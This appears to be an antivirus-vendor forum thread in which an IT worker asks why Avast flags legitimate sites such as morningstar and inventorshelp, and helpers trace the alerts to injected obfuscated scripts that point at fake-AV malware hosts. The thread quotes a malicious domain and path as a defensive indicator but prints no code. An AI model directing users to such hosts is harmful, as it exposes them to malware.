i have several warnings from client machines that perfectly legit websites are infected by html:script-inf
the latest one is this:
: File “hxxp://advisor.morningstar.com/microsite/default.aspx?client=cambridge” is infected by “HTML:Script-inf” virus.
“Resident protection (Web Shield)” task used Version of current VPS file is 110330-0, 03/30/2011
is there something bad about that site, or is a script just causing avast to freak because it’s redirecting or something?
i wish there was a way to just whitelist “html:script-inf” and the other ones that seem way too broad (html:iframe-inf, win32:malware-gen) some previous examples that seem to come and go:
d:\autorun.inf on a factory stamped office 2000 cd. surely the non-writable factory cd is infected with inf:autorun worm
File “hyyp://www.inventorshelp.com/index.php?option=com_contact&view=contact&id=1&Itemid=72” is infected by “JS:Redirector-DC [Trj]” virus
File “C:\Documents and Settings\All Users\Application Data\Adobe\Acrobat\9.2\ARM\Elevator.exe” is infected by “Win32:Malware-gen”
basically anything on photobucket, html-script-inf
File “hzzp://my.yahoo.com/” is infected by "HTML:Script-inf
but the only one i really care about right now is our client trying to get to morningstar.com, which being an investment site, you can imagine they’re panicking about it being a virus site now
Web application details:
Application: Joomla! 1.5 - Open Source Content Management - http://www.joomla.org
Web application version:
Joomla Version 1.5.8 to 1.5.14 for: htxp://www.inventorshelp.com//media/system/js/caption.js
Joomla Version 1.5.2 to 1.5.7 for: hxtp://www.inventorshelp.com//language/en-GB/en-GB.ini
Please can you modify the link, to prevent others potentially becoming infected. (change http to hXXp) Thanks.
For the morningstar link, it seems that avast is alerting on a script that points to a php file on a site that avast blocks (network shield blocks a direct connection)
This script occurs 3 times within the page.
Whether the detection on the site it links to is good or not I don’t know.
The site it links to appears to be down, however avast still blocks the attempt to connect.
on the inventorshelp site, you said sucuri says this:
Malware entry: MW:JS:445
Description:This encoded javascript loads malware (the fake AV) from:
*.ars3000.serveblog.net/ml.php (and other domains)
i want to know where on inventorshelp actually loads that malware
or is it because inventorshelp mentions joomla’s homepage at the very bottom, basically saying joomla is used on parts of the site… and maybe joomla’s homepage actually loads the malware?
i don’t get any attempted infections when browsing around inventorshelp - it seems to be a pretty legit site anyway, just trying to see how the flow is when it comes to detections. does avast check every link 3 levels deep or something? (inventorshelp mentioned joomla, so go scan joomla, which mentions about 400 other random urls, so go check them all - if one is infected then inventorshelp must be infected?)
thanks for the additional info on inventorshelp - are you just looking at the view-source or is there an avast utility that can highlight what it thinks is infected?
i can’t tell what that script even does, avast just doesn’t like the length?
I an using a couple of tools…that is just a notepad++ window after I have pulled the source code. Then I isolate sections to find what avast is alerting on.
Using another tool, it appears that all that code returns a script that points to another site (avast will alert on this unobfuscated script as well). What is happening from there I don’t know.
I can’t seem to get any of the sites to resolve properly…Could be because I am trying in ubuntu?
EDIT: Pol, one of your links is one of the possibly infected ones and is live
@ I can’t seem to get any of the sites to resolve properly…Could be because I am trying in ubuntu?
well, i think dns is dns - resolution of names won’t be dependent on the OS
now i see how that long script is really a URL, amazing to me. that site (investorshelp) should have nothing to do with a php file served from servemp3 dot com…
how does this stuff even happen, just poorly set permissions on people’s website files?
btw, i have nothing to do with creating or securing websites, i’m just receiving alerts from our client antiviruses
wow - i guess i assumed the bigger the website, the more SECURE it would be… and found it laughable that for example my.yahoo.com would be infected.
now i can see how involved it gets - yahoo probably doesn’t check all the advertisements they load, and the advertisers probably swap out scripts a day or two after, for something more malicious
should i even tell morningstar or inventorshelp, or would they not care / not believe me ?
If anything, a bigger site is a bigger target…and things like older management systems like wordpress etc… contribute to the infections…generally when you see updates for things like that it is (at least in part) for a security update.
@ I can't seem to get any of the sites to resolve properly...Could be because I am trying in ubuntu?
I meant the sites that the scripts point to. I have read that some are coded to only work in windows...similar to how some malware can detect when being run in a VM...
You can try and let the site owners know, and even send the link to this thread.
@ bryonTRN
Well my.yahoo.com opened just fine for me (no alert) my.yahoo.com as it is different based on a) if you have a Yahoo account and b) geographic location, etc.
If you have an account so you are redirected to you account default page, for me that is home.bt.yahoo.com and I don’t get an alert.
So unless you haven’t got a Yahoo account you shouldn’t end up at my.yahoo.com I would have thought.
as I was bryonTRN, I would do an additional spyware scan, quote from the link I gave above
this was done via ftp transfer with accounts user and pass.
It’ happent to few of my clients, weeks after I gave them the cpanel password, as their are local clients and I developed their website, I keep all the passwords and tell them the password only if they ask me or need it.
Your computer or clients computer is infected with some kind of spyware, and probably the password ware keeped in txt files.
I also recommend to save your password in free programs like KeePass Password Safe
last week i got alerts from about 20% of our installed clients, all referencing my.yahoo.com (from my first post in this thread) - so yeah not sure what they were seeing but it seems to have went away after the next updated virus defs
so - what can be done about these rogue AV infections coming from perfectly legit websites? can’t really block the referenced url’s they point to because they’re recreated thru automated processes… i mean there has to be a money trail, is there anyone even trying to stop them?
i’d bet there’s probably 10-20 actual humans behind all the various fake-av clones out there, why not just take them down? (not to derail the thread or anything)
Well avast’s web shield has blocked those script-inf attempts to infect for those sites that we have given information on. Avast is by far ahead of the game on these detections compared to others, but nothing is going to be 100%. So everyone should have a backup and recovery strategy for when things do happen, be that system problems or malware.
So all you can do is investigate the fact that avast is alerting learn how we have found out that the detections are good (or otherwise) and that avoids having to wait for us to check it out.
They aren’t what I would consider human, but organised crime as it is all about money, fake AV reports you are infected, wants you to buy solution. Guess what, if a user actually hands over money, these leaches could likely be subjected to card/identity fraud also.